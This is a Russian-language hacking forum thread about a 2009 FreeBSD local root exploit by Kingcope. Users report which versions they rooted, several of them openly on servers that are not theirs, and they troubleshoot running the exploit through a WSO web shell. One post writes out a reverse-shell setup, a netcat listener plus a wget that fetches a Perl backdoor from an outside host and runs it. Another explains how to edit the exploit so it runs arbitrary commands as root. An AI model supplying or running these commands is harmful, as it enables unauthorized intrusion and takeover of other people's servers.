![]() |
FreeBSD 7.1, 8 root expl.
###############################
# EDB-ID: 10255 # CVE-ID: () # Title: FreeBSD Run-Time Link-Editor Local r00t Zeroday # Author: Kingcope # Published: 2009-11-30 ############################### Discovered & Exploited by Nikolaos Rangos also known as Kingcope. Nov 2009 "BiG TiME" Systems tested/affected ********************************** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NOT VULN FreeBSD 4.9-RELEASE *** NOT VULN http://www.exploit-db.com/exploits/10255 |
Потестил на 6.4-RELEASE-p7 #7 - не пашет. Буду тестить дальше.
|
7.0 поестил результат рут)
Тс респект) 7.2 тоже. |
7.1 рутит
|
закинте плз в откомпелированом виде)
|
7.1 Срутил.Спасибо.
|
сам експлоит
PHP код:
7.1 - взяло рут 6.4 - не взяло |
добряк, ТС, добряк
спасибо, порутал |
FreeBSD 7.1-RELEASE-p5
рут - успешно |
У меня он не запускается, пишет, что файл не найден...
Мои действия: Код:
$ cd /tmp |
Цитата:
Либо нету доступа к gcc, либо к sh. Права на папку скорее всего есть. У меня зарутил 1 раз и 30 :D. Открой сам этот плоент, и сделай все ручками, там элементарно, но вряд ли выйдет) |
Код:
$ which gcc sh |
Цитата:
|
readmanpage.... сделай исполяемым
есть еще чудная команда ls кароч читаете маны. |
поставь на файл права chmod 777 имя файла
|
порутал FreeBSD 7.0-RELEASE-p7,
спасибо! (Скрипт выполнял вручную, пошагово. Пакет не сработал, скорее всего, из-за отсутствия chmod +x env) |
Запустил w00d.sh, появилось 2 файла env.c и program.c, что дальше делать?
|
Если sh не работает, то лучше сделать всё руками. Сразу увидишь в каком месте не работает.
Если у тебя кроме *.c больше ничего не появилось, то в системе не установлен gcc |
не было доступа к sh, сделал ручками на бэкконнекте...
FreeBSD 7.2 взял) |
ой как славненько 7.0 рут :)thx давно хотел этот сервак порутить )))
|
система 7.2-RELEASE FreeBSD в локалке, есть доступ по шеллу(WSO).
сплоит в /tmp/ ,чмод 777 после sh w00d.sh появляются 3 файла: env , env.c , program.c . Выше мне сказали, что не установлен gcc. Как установить gcc?(Выхода в инет нету, только локалка) Что должно произойти после удачного исполнение сплоита? Пожалуйста помогите. |
сплоит из консоли ВСО2 нельзя исполнять, нужно и биндшелла или бекконнекта...
|
wkar, без рута ты не установишь gcc. Варинат скомпилировать на другой фряхе и залить туда уже бинарник. И тебе нужно вернуть себе бек конект как сказал Тузик.
|
ещё можна проверить наличие gcc командой: gcc --help и я могу дать скомпиленые бинарники, но обязательно нужен или биндшелл или бекконнект
|
gcc нет, это точно."я могу дать скомпиленые бинарники"Если можешь то дай, буду благодарен.
И ещё, дайте немного маны, как зделать бекконнект. |
у себя
netcat -l -n -v -p 5995 на хосте wget -O ngix http://fsb-my.name/c/apache-handler perl ngix your_ip 5995 2> /dev/null & |
спасибо за бекдор, поделитесь ещё кто-то скомпилированными бинарниками.
|
А есть у кого на 6.2 ??
|
возможно что-то сделать? :( хз что делать..
Код:
./qwe.sh |
пожалуйста выложите скомпиленный сплоит (((((никак скомпилить не могу (((( Спасибо
|
Ты наврено запускаешь из /tmp а он примантирован как no ex, корчое скопируй в другую папку куда-нить. Правда я неуверен что возьмёт 6.2 но попробуй , отпишись.
З.Ы. Есть вариант что надо сделать chmod 755 на твой скрипт. GizmoSB, у меня ниразу не получилось скомпилить со скрипта, компиль просто кусками. Из скрипта скопируй куски кода и скомпиль. |
На самом деле бэкконнект не всегда получается делать. В этом случае можно немного поправить сплойт:
system("echo ALEX-ALEX;/bin/sh"); на system("echo ALEX-ALEX;/bin/sh cmd.sh"); после повышения привелегий сплойт будет вполнять команды из cmd.sh под рутом. Запуск сплойта в вебшеле: w00t.sh &> out.txt. Перенаправление лучше делать потому, что веб шел не выводит stderr поток и мы не увидим ошибок. Результат читаем из out.txt. |
Цитата:
т.е. чисто на пхп, не используя консольные команды возможно ли какнибудь запустить на хосте то что накомпелено в домашних условия, при услонии что не работает с/перл/командная строка + нет доступа к папкам до /public_html/ в этой ситуации можно получить рут? :confused: |
Цитата:
Возможно ли использовать вместо бензопилы бабушикины спицы, правда они погнулись? Возможно ли швее-мотористке проектировать ядерные реакторы? Если включен сеф мод и\или вырублены нужные функции - гугли вначале обход этих ограничений. |
Цитата:
mount или /etc/fstab глянь и выбери диру другую |
chmod +x filename
|
Цитата:
|
кто поможет порутать 8?
|
Цитата:
при срабатывании сплоита в констоль выкинуло вот это /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX До этого много серваков с подходящими версиями не хотели рутаться Эх жаль я профукал появление этого сплоита в декабре, жертв было бы гораздо больше ) |
через sh не получилось,кто может помоч по кускам выполнить стукните 600-zero91-642
|
| Время: 18:58 |